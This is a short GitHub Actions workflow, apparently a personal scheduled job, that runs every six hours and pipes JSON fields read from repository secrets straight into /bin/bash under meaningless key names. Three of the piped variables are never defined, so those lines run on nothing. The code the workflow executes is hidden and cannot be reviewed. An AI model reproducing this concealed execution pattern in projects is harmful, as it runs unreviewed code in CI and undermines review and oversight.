name: mantouchoubao
on:
  workflow_dispatch:
  schedule:
    - cron: '14 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: mantouchoubao
        env:
          tu3: ${{ secrets.tu3 }}
        run: |
          echo $tu3 | jq -r .mpkzw7332 | /bin/bash
          echo $zin40 | jq -r .qniks04681 | /bin/bash
          echo $tuw50 | jq -r .rp40 | /bin/bash
          echo $dsxde56 | jq -r .ggrdk49 | /bin/bash

